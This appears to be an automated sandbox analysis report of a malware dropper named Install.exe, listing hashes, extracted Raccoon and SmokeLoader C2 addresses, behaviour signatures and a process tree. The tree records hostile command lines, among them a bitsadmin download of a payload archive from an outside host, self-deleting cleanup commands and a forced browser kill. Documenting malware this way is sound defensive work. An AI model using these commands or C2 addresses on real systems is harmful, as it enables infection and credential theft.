Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1801s
  • max time network
    1346s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 08:59

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 33 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2768
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2460
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2424
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1764
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1344
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1296
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1136
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:932
                    • C:\Users\Admin\AppData\Roaming\bfcggfb
                      C:\Users\Admin\AppData\Roaming\bfcggfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4752
                      • C:\Users\Admin\AppData\Roaming\bfcggfb
                        C:\Users\Admin\AppData\Roaming\bfcggfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5124
                    • C:\Users\Admin\AppData\Roaming\edcggfb
                      C:\Users\Admin\AppData\Roaming\edcggfb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2212
                    • C:\Users\Admin\AppData\Roaming\bfcggfb
                      C:\Users\Admin\AppData\Roaming\bfcggfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4816
                      • C:\Users\Admin\AppData\Roaming\bfcggfb
                        C:\Users\Admin\AppData\Roaming\bfcggfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5904
                    • C:\Users\Admin\AppData\Roaming\edcggfb
                      C:\Users\Admin\AppData\Roaming\edcggfb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4760
                    • C:\Users\Admin\AppData\Roaming\bfcggfb
                      C:\Users\Admin\AppData\Roaming\bfcggfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2300
                      • C:\Users\Admin\AppData\Roaming\bfcggfb
                        C:\Users\Admin\AppData\Roaming\bfcggfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2168
                    • C:\Users\Admin\AppData\Roaming\edcggfb
                      C:\Users\Admin\AppData\Roaming\edcggfb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5708
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1004
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:796
                      • C:\Users\Admin\AppData\Local\Temp\is-C5L9P.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-C5L9P.tmp\Install.tmp" /SL5="$601DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3908
                        • C:\Users\Admin\AppData\Local\Temp\is-57COD.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-57COD.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:508
                          • C:\Program Files\Internet Explorer\JPCLQRAAHQ\ultramediaburner.exe
                            "C:\Program Files\Internet Explorer\JPCLQRAAHQ\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1020
                            • C:\Users\Admin\AppData\Local\Temp\is-TU38C.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-TU38C.tmp\ultramediaburner.tmp" /SL5="$6002E,281924,62464,C:\Program Files\Internet Explorer\JPCLQRAAHQ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:1564
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3940
                          • C:\Users\Admin\AppData\Local\Temp\a1-aa914-a5e-3d9a9-1afcf691d2018\SHyfilamura.exe
                            "C:\Users\Admin\AppData\Local\Temp\a1-aa914-a5e-3d9a9-1afcf691d2018\SHyfilamura.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2080
                          • C:\Users\Admin\AppData\Local\Temp\dc-3df57-fe4-3799e-983cc19667efb\Werocamocu.exe
                            "C:\Users\Admin\AppData\Local\Temp\dc-3df57-fe4-3799e-983cc19667efb\Werocamocu.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2184
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjoike3e.bqc\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4852
                              • C:\Users\Admin\AppData\Local\Temp\sjoike3e.bqc\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\sjoike3e.bqc\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:5108
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0vuybai.1hy\google-game.exe & exit
                              5⤵
                                PID:4272
                                • C:\Users\Admin\AppData\Local\Temp\n0vuybai.1hy\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\n0vuybai.1hy\google-game.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:4456
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4684
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhfbcjpj.km2\md1_1eaf.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4648
                                • C:\Users\Admin\AppData\Local\Temp\mhfbcjpj.km2\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\mhfbcjpj.km2\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  PID:4936
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yamvib2p.5u1\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4916
                                • C:\Users\Admin\AppData\Local\Temp\yamvib2p.5u1\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\yamvib2p.5u1\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3004
                                  • C:\Users\Admin\AppData\Local\Temp\AzT64jtQF0.exe
                                    "C:\Users\Admin\AppData\Local\Temp\AzT64jtQF0.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:5468
                                    • C:\Users\Admin\AppData\Roaming\1619348638975.exe
                                      "C:\Users\Admin\AppData\Roaming\1619348638975.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619348638975.txt"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5548
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AzT64jtQF0.exe"
                                      8⤵
                                        PID:4300
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          9⤵
                                          • Runs ping.exe
                                          PID:4532
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yamvib2p.5u1\y1.exe"
                                      7⤵
                                        PID:4876
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:4588
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhqph0dm.dls\askinstall39.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4608
                                    • C:\Users\Admin\AppData\Local\Temp\nhqph0dm.dls\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\nhqph0dm.dls\askinstall39.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:2012
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:5344
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:5500
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00znggue.lpl\inst.exe & exit
                                      5⤵
                                        PID:4712
                                        • C:\Users\Admin\AppData\Local\Temp\00znggue.lpl\inst.exe
                                          C:\Users\Admin\AppData\Local\Temp\00znggue.lpl\inst.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4220
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brnrqhto.g4l\SunLabsPlayer.exe /S & exit
                                        5⤵
                                          PID:4624
                                          • C:\Users\Admin\AppData\Local\Temp\brnrqhto.g4l\SunLabsPlayer.exe
                                            C:\Users\Admin\AppData\Local\Temp\brnrqhto.g4l\SunLabsPlayer.exe /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:1552
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5928
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5544
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5560
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4304
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5236
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:5472
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5304
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                                PID:4876
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                              7⤵
                                                              • Checks for any installed AV software in registry
                                                              PID:5856
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              7⤵
                                                              • Download via BitsAdmin
                                                              PID:5952
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pP4sJ2Xts2O9yQyZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:5568
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4336
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4432
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5188
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5372
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5368
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:3016
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PacYsWiIQZ\PacYsWiIQZ.dll" PacYsWiIQZ
                                                                        7⤵
                                                                        • Loads dropped DLL
                                                                        PID:5228
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PacYsWiIQZ\PacYsWiIQZ.dll" PacYsWiIQZ
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          PID:5244
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5744
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:492
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5668
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5708
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu2B0A.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:1716
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5192
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwnh5y0r.ctk\GcleanerWW.exe /mixone & exit
                                                                          5⤵
                                                                            PID:3976
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              6⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4272
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wtlvygjm.gf2\toolspab1.exe & exit
                                                                            5⤵
                                                                              PID:5276
                                                                              • C:\Users\Admin\AppData\Local\Temp\wtlvygjm.gf2\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\wtlvygjm.gf2\toolspab1.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5556
                                                                                • C:\Users\Admin\AppData\Local\Temp\wtlvygjm.gf2\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\wtlvygjm.gf2\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5164
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\acsvnq5z.yjp\c7ae36fa.exe & exit
                                                                              5⤵
                                                                                PID:5472
                                                                                • C:\Users\Admin\AppData\Local\Temp\acsvnq5z.yjp\c7ae36fa.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\acsvnq5z.yjp\c7ae36fa.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5800
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qacx4jkq.mpj\app.exe /8-2222 & exit
                                                                                5⤵
                                                                                  PID:5652
                                                                                  • C:\Users\Admin\AppData\Local\Temp\qacx4jkq.mpj\app.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\qacx4jkq.mpj\app.exe /8-2222
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5912
                                                                                    • C:\Users\Admin\AppData\Local\Temp\qacx4jkq.mpj\app.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\qacx4jkq.mpj\app.exe" /8-2222
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:3568
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                          1⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1172
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                            2⤵
                                                                            • Drops file in System32 directory
                                                                            • Checks processor information in registry
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:4832
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          • Modifies Internet Explorer settings
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1236
                                                                        • C:\Windows\system32\browser_broker.exe
                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          PID:4976
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                          1⤵
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4732
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4108
                                                                        • C:\Windows\system32\werfault.exe
                                                                          werfault.exe /h /shared Global\54b49a5db3df415684470fd0c723e713 /t 4200 /p 4108
                                                                          1⤵
                                                                            PID:5716
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            PID:6136
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            PID:6008
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
